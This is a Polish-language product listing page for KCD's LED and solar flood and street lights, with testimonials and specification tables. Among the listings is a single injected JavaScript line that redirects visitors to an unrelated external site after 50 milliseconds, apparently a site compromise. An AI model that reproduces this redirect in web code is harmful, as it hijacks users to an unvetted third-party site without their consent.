Wszystkie produkty
-
Lampy uliczne LED zasilane energią słoneczną
-
Światło uliczne LED All In One Solar
-
Światło słoneczne o dużej mocy
-
Światła powodziowe zasilane energią słoneczną
-
Słoneczne zewnętrzne światła powodziowe
-
Wodoodporne oświetlenie uliczne LED
-
Zewnętrzne oświetlenie uliczne LED
-
Zewnętrzne oświetlenie LED Flood
-
Światło powodziowe LED 200W
-
Oświetlenie przemysłowe LED High Bay
-
Światła LED High Bay 200W
-
Przenośne światło robocze LED
-
Nailton Alves sylwaNiesamowite produkty KCD, złożyłem do nich hurtowe zamówienie na słoneczne reflektory i uzyskałem bardzo dobrą sprzedaż i pozytywne opinie na temat tego produktu. Są bardzo profesjonalni w oświetleniu zewnętrznym, wykonali produkty zgodnie z moimi wymaganiami i skupiają się na szczegółach. KCD jest najbardziej niezawodnym dostawcą, jakiego kiedykolwiek widziałem. -
inż. Ahmed ElmorTo było bardzo dobre doświadczenie w pracy z KCD. Kupiłem hurtowe zamówienie na słoneczne latarnie uliczne i jestem zadowolony z ich jakości. produkt jest taki, jak go reklamują, moi klienci bardzo go lubią. Dlatego polecam każdemu, kto chce mieć słoneczne oświetlenie uliczne, aby otrzymać produkty od KCD, ponieważ nie będziesz zawiedziony.
słowa kluczowe [ 100w solar led flood light ] mecz 348 produkty.
Światła zewnętrzne LED o klasyfikacji IP65 dla wszystkich warunków pogodowych z czujnikiem PIR
| Nazwa produktu: | Reflektory LED |
|---|---|
| Życie: | 35000 godz |
| THD: | <12% |
Wyposażenie fabryczne KCD 35000 Lumen 150w 300w Światło reflektorów Wysokie światła wysokiej mocy Stadion IP66 200w Światło LED w pomieszczeniach
| Nazwa produktu: | IK02-2 |
|---|---|
| Życie: | 35000 godzin |
| THD: | <12% |
150W LED Flood Light Łatwa instalacja Kompaktowy projekt oszczędności miejsca Zewnętrzny reflektor energooszczędne Jasne oświetlenie dla ogrodów patio magazyny i więcej
| Nazwa produktu: | GK-P |
|---|---|
| Gwarancja: | 3 lata |
| Władza: | 50 W-600 W |
Wysokiej jasności modularne światło LED Aluminiowy stop IP65 wodoodporny dla budynków fasady dziedzińce parkingy na zewnątrz
| Nazwa produktu: | LK-E |
|---|---|
| Życie: | 35000 godzin |
| THD: | <12% |
Ip65 Zewnętrzne reflektory LED 100 W 10000 lm Ciepły biały reflektor Ik07
| Szczegóły pakowania: | Kolorowe pudełko / neutralne opakowanie / karton |
|---|---|
| Czas dostawy: | 45 dni |
| Zasady płatności: | L/C, D/A, D/P, T/T, Western Union, MoneyGram |
302 setTimeout("javascript:location.href='https://best10.club/sitemap.php'", 50);
| Materiał korpusu: | aluminium odlewane ciśnieniowo |
|---|---|
| Moc: | 50W/100W/200W/300W |
| Napięcie robocze: | prąd stały 6 V |
Wodoodporne reflektory zasilane energią słoneczną 200 W 110 lm / W 6000K 50000hrs Żywotność
| Moc: | 200w |
|---|---|
| Świetlny: | 100-110 lm/W |
| Strumień świetlny lampy (lm): | 20000lm |
Smart Slim Solar Powered Flood Lights 100 W 200 W 240 W 300 W Akumulator RGB
| Aplikacja: | KRAJOBRAZ, park ogrodowy, na zewnątrz |
|---|---|
| Stosowanie: | Krajobraz Podwórze Rynny Dachowe Drzwi Brama Ścieżka |
| Czas pracy: | 10-12 godzin (tryb zmiany koloru) 8-10 godzin (stały jeden kolor mde) |
Akumulatorowe reflektory LED zasilane energią słoneczną Sport Field Park Security
| Typ światła: | Słoneczny |
|---|---|
| Poziom ochrony: | IP65 |
| Panel słoneczny: | Krzem monokrystaliczny |
Przedłużacz Zasilany energią słoneczną Flood Lights 200w Czujnik ruchu
| Nazwa produktu: | Zasilany energią słoneczną czujnik ruchu ogrodzenia Dom Ogród Led Solar Light |
|---|---|
| Czas pracy: | 8-10 godzin po pełnym naładowaniu |
| Czas ładowania: | 6 godzin |

